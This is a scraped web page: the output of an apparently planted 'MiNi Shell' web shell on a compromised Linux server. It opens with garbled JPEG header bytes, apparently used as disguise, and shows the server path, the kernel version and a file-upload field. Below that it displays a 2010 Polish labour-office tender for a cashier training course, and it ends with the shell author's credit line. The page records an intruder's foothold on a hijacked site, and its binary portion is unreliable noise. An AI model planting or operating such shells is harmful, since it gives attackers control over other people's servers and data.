JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101007/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101007/278075-N-2010.html

<p class="kh_header"><b>Stalowa Wola: Usługa organizacji szkolenia dla 36 osób bezrobotnych w zakresie:  Fakturzysta z obsługą  kasy fiskalnej z elementami obsługi komputera, programu do fakturowania oraz minimum sanitarnym.</b><br>
<b>Numer ogłoszenia: 278075 - 2010; data zamieszczenia: 07.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Stalowej Woli , ul. Dmowskiego 8, 37-450 Stalowa Wola, woj. podkarpackie, tel. 015 6433780, faks 015 6433787.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa organizacji szkolenia dla 36 osób bezrobotnych w zakresie:  Fakturzysta z obsługą  kasy fiskalnej z elementami obsługi komputera, programu do fakturowania oraz minimum sanitarnym..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie  szkolenia dla 36 osób bezrobotnych, w trzech grupach po 12 osób, zarejestrowanych w Powiatowym Urzędzie Pracy w Stalowej Woli w zakresie: Fakturzysta z obsługą kasy fiskalnej z elementami obsługi komputera, programu do fakturowania oraz minimum sanitarnym. Uczestnikami szkolenia będą osoby, które posiadają wykształcenie minimum zasadnicze zawodowe.a)Cel szkolenia: nabycie przez uczestników szkolenia wiedzy teoretycznej oraz praktycznych umiejętności z zakresu fakturowania oraz obsługi kasy fiskalnej.b)Instytucja szkoleniowa powinna posiadać aktualny wpis do Rejestru Instytucji Szkoleniowych WUP.c)Miejsce realizacji szkolenia:  Stalowa Wola.W ofercie należy wskazać dokładny adres realizacji zajęć teoretycznych  i praktycznych. Szkolenie powinno być realizowane w trzech grupach równolegle.d)Szkolenie powinno być realizowane przez podmiot posiadający: warunki lokalowe, kadrę wykładowców, warunki socjalne i wyposażenie dydaktyczne do prowadzenia zajęć szkoleniowych.e)  Program szkolenia  powinien  zawierać co najmniej:1. Prawne aspekty sprzedaży,
2. Wystawianie faktur i paragonów,3. Nowoczesne techniki sprzedaży,
4. Profesjonalną obsługę klienta,5. Przepisy prawne dotyczące reklamacji i gwarancji towarów,6. Inwentaryzację,7. Podstawy towaroznawstwa,8. Podstawy obsługi komputera,9. Teoretyczne i prawne podstawy obsługi kas fiskalnych,
10. Praktyczną obsługę kas fiskalnych oraz portalu płatniczego,11.  Pracę z programem komputerowym do fakturowania,12. Aspekty higieniczno- sanitarne przy produkcji i obrocie środkami spożywczymi . 		
Zajęcia szkoleniowe z zakresu obsługi programu komputerowego do fakturowania powinny być realizowane na programie z pakietu firmy CDN klasyka - FPP lub Subiekt GT firmy Insert.Na zagadnienia określone w Rozdziale 2, pkt 2, lit. e  od 1 do 7 powinno być przeznaczone nie więcej niż 40 godzin lekcyjnych tj. prawne aspekty sprzedaży, wystawianie faktur i paragonów, nowoczesne techniki sprzedaży, profesjonalna obsługa klienta, przepisy prawne dotyczące reklamacji i gwarancji towarów, inwentaryzacja, podstawy towaroznawstwa.
Szkolenie powinno zakończyć się egzaminem wewnętrznym, sprawdzającym nabytą wiedzę teoretyczną i praktyczne umiejętności uczestników.f)Liczba godzin szkolenia powinna być podana w godzinach zegarowych i stanowić sumę: liczby godzin zajęć edukacyjnych, liczby godzin przeznaczonych na przerwy oraz liczby godzin przeznaczonych na egzamin wewnętrzny. -Liczba godzin zajęć edukacyjnych - 140 godzin lekcyjnych (45 minut)-Czas przeznaczony na przerwy nie może przekroczyć 15 % liczby godzin szkolenia-Liczba godzin przeznaczonych na egzamin wewnętrzny:  podaje Wykonawca w godzinach zegarowych.
Do liczby godzin dydaktycznych szkolenia ogółem nie należy wliczać godzin przewidzianych na egzamin.g)Szkolenie powinno odbywać się w formie kursu realizowanego według planu nauczania obejmującego przeciętnie nie mniej niż 30 godzin zegarowych  w tygodniu. Zajęcia szkoleniowe mogą odbywać się w godzinach od 800 do 1800 .  Liczba godzin szkolenia nie może przekroczyć 8 godzin zegarowych dziennie, a w przypadku zajęć komputerowych 5 godzin zegarowych dziennie. Zajęcia komputerowe mogą być łączone z pozostałymi zajęciami pod warunkiem nie przekroczenia łącznej liczby 8 godzin zegarowych dziennie. 
Zajęcia winny odbywać się w grupach, z tym że liczba osób w grupie powinna być dostosowana do warunków lokalowych oraz sprzętowych, aby umożliwić uczestnikom kursu korzystanie z przekazywanej wiedzy teoretycznej   i praktycznej w dostatecznym zakresie. W harmonogramie szkolenia należy wykazać przerwy w wymiarze uzasadnionym.h) Wykonawca powinien zapewnić każdemu uczestnikowi szkolenia niezbędne materiały  szkoleniowe i dydaktyczne (zgodnie z aktualnym stanem prawnym), Wykonawca  zapewnia każdemu uczestnikowi szkolenia: teczkę na materiały dydaktyczne, długopis, notatnik oraz materiały dydaktyczne niezbędne do utrwalenia wiadomości w celu pozytywnego zdania egzaminu, mogą to być       np. podręczniki, kserokopie treści przekazywanych w trakcie zajęć szkoleniowych.  
Materiały szkoleniowe opracowane przez Wykonawcę stanowić powinny rozwinięcie zagadnień objętych programem szkolenia, w sposób przystępny przedstawiać praktyczne informacje ułatwiające uczestnikom szkolenia przyswajanie wiedzy.
Materiały szkoleniowe mogą stanowić również gotowe publikacje dostępne na rynku. Nie mogą zawierać zapożyczeń z prac osób trzecich oraz nie mogą naruszać praw przysługujących osobom trzecim, w szczególności praw autorskich tych osób.
Wszystkie materiały muszą być przygotowane i rozdane uczestnikom szkolenia  w pierwszym dniu szkolenia. Po zakończeniu szkolenia materiały dydaktyczne przechodzą na własność każdego uczestnika szkolenia. i) W trakcie odbywania zajęć teoretycznych  jak i praktycznych powinny być zapewnione właściwe, zgodne z obowiązującymi przepisami warunki bezpieczeństwa i higieny pracy. Na zajęciach praktycznych uczestnicy szkolenia powinni mieć do dyspozycji odpowiedni sprzęt spełniający wymogi bezpieczeństwa zgodnie  z obowiązującymi w tym zakresie przepisami prawa. Sala komputerowa powinna być wyposażona w odpowiednią liczbę stanowisk. Na jednego uczestnika szkolenia musi przypadać jedno stanowisko komputerowe z zainstalowanym niezbędnym oprogramowaniem oraz dostępem do drukarki.  Na czas trwania kursu Wykonawca zobowiązuje się zapewnić uczestnikom szkolenia odpowiednie warunki lokalowe oraz socjalne do prawidłowego przebiegu szkolenia.j)  W całkowitym koszcie szkolenia należy uwzględnić wszystkie pozycje zawarte w preliminarzu, w tym koszt materiałów dydaktycznych, które otrzymają uczestnicy na własność np. skrypty, podręczniki, materiały  piśmiennicze  itp..k) Po zakończeniu szkolenia i pozytywnym zdaniu egzaminu wewnętrznego  Wykonawca  zobowiązany jest wydać uczestnikom szkolenia zaświadczenia o ukończeniu kursu zgodnie z kierunkiem odbytego szkolenia na podstawie  § 6 Rozporządzenia Ministra Edukacji i Nauki z dnia 3 lutego 2006r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz.216). l)  Zajęcia powinny być prowadzone przez imiennie wskazanych wykładowców  o odpowiednich kwalifikacjach i doświadczeniu, spełniających wymogi przewidziane w odrębnych przepisach.ł) Wykonawca zapewni nadzór wewnętrzny służący podnoszeniu jakości prowadzonego szkolenia oraz dokona sprawdzenia efektów szkolenia. m)  Wykonawca zapewni uczestnikom szkolenia dostęp do serwisu kawowego, tj. kawy, herbaty, ciastek, napojów..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek posiadania wiedzy  i doświadczenia, jeżeli wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował co najmniej trzy szkolenia grupowe (dla minimum 10 osób) o kierunku zgodnym z przedmiotem zamówienia lub szkolenia o podobnej tematyce,  z podaniem odbiorcy, kierunku szkolenia, wartości, daty i miejsca wykonania i przedłoży dokumenty np. referencje potwierdzające, że usługi te zostały wykonane należycie, podpisane przez osoby upoważnione do reprezentowania wystawiającego dokument.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dysponowania odpowiednim potencjałem technicznym,jeżeli przedłoży wykaz niezbędnego do realizacji zamówienia sprzętu wykorzystywanego do realizacji przedmiotu zamówienia wraz z informacją  o podstawie dysponowania tymi zasobami.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek dysponowania osobami zdolnymi do wykonania zamówienia, jeżeli złoży oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia.
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do  wykonania zamówienia  lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - kwalifikacje kadry dydaktycznej w prowadzeniu szkoleń z zakresu przedmiotu zamówienia lub poszczególnych modułów - 10</li>
<li>3 - posiadanie przez Wykonawce certyfikatu jakości usług, akredytacji kuratora oświaty na kierunek zgodny z temat. szkolenia lub innego cert. równorzędneg - 5</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Wykonawca zobowiązany jest zapoznać się z Wzorem umowy - Załącznik Nr 7    do SIWZ i zaakceptować jej postanowienia.2.Zamawiający dopuszcza zmianę zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących okolicznościach:a)Zmiana wskazanego do zajęć praktycznych sprzętu, innych pomocy dydaktycznych. Zmieniony sprzęt, inne pomoce dydaktyczne mają posiadać parametry tożsame lub lepsze od przyjętych w ofercie. Zmiana następuje za zgodą Zamawiającego i jest możliwa tylko w okolicznościach powstałych, na które nie miał wpływu Wykonawca.
b)Zmiana wskazanego w ofercie wykładowcy tylko na wykładowcę o kwalifikacjach  doświadczeniu tożsamym lub lepszym. Zmiana następuje za zgodą Zamawiającego i jest możliwa tylko w okolicznościach powstałych, na które nie miał wpływu Wykonawca.c)Zmiana lokalu wskazanego w ofercie do zajęć szkoleniowych tylko na lokal w tej samej miejscowości o standardach tożsamych lub lepszych od przyjętych w ofercie. Zmiana następuje za zgodą Zamawiającego i jest możliwa tylko w okolicznościach powstałych, na które nie miał wpływu Wykonawca.
d)Gdy nastąpi zamiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia.e)Gdy nastąpi zmiana danych Zamawiającego lub Wykonawcy.f)Zmiana dotycząca przedłożonego w ofercie harmonogramu szkolenia.  Zmiana następuje za zgodą Zamawiającego i jest możliwa tylko w okolicznościach powstałych, na które nie miał wpływu Wykonawca.  3.Zamawiający nie przewiduje udzielania zaliczek na poczet wykonania zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pupstalowawola.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urzad Pracy w Stalowej Woli, ul. Dmowskiego 8, 37-450 Stalowa Wola, pok.29, I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.10.2010 godzina 12:00, miejsce: Powiatowy Urzad Pracy w Stalowej Woli, ul. Dmowskiego 8, 37-450 Stalowa Wola, pok.29, I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com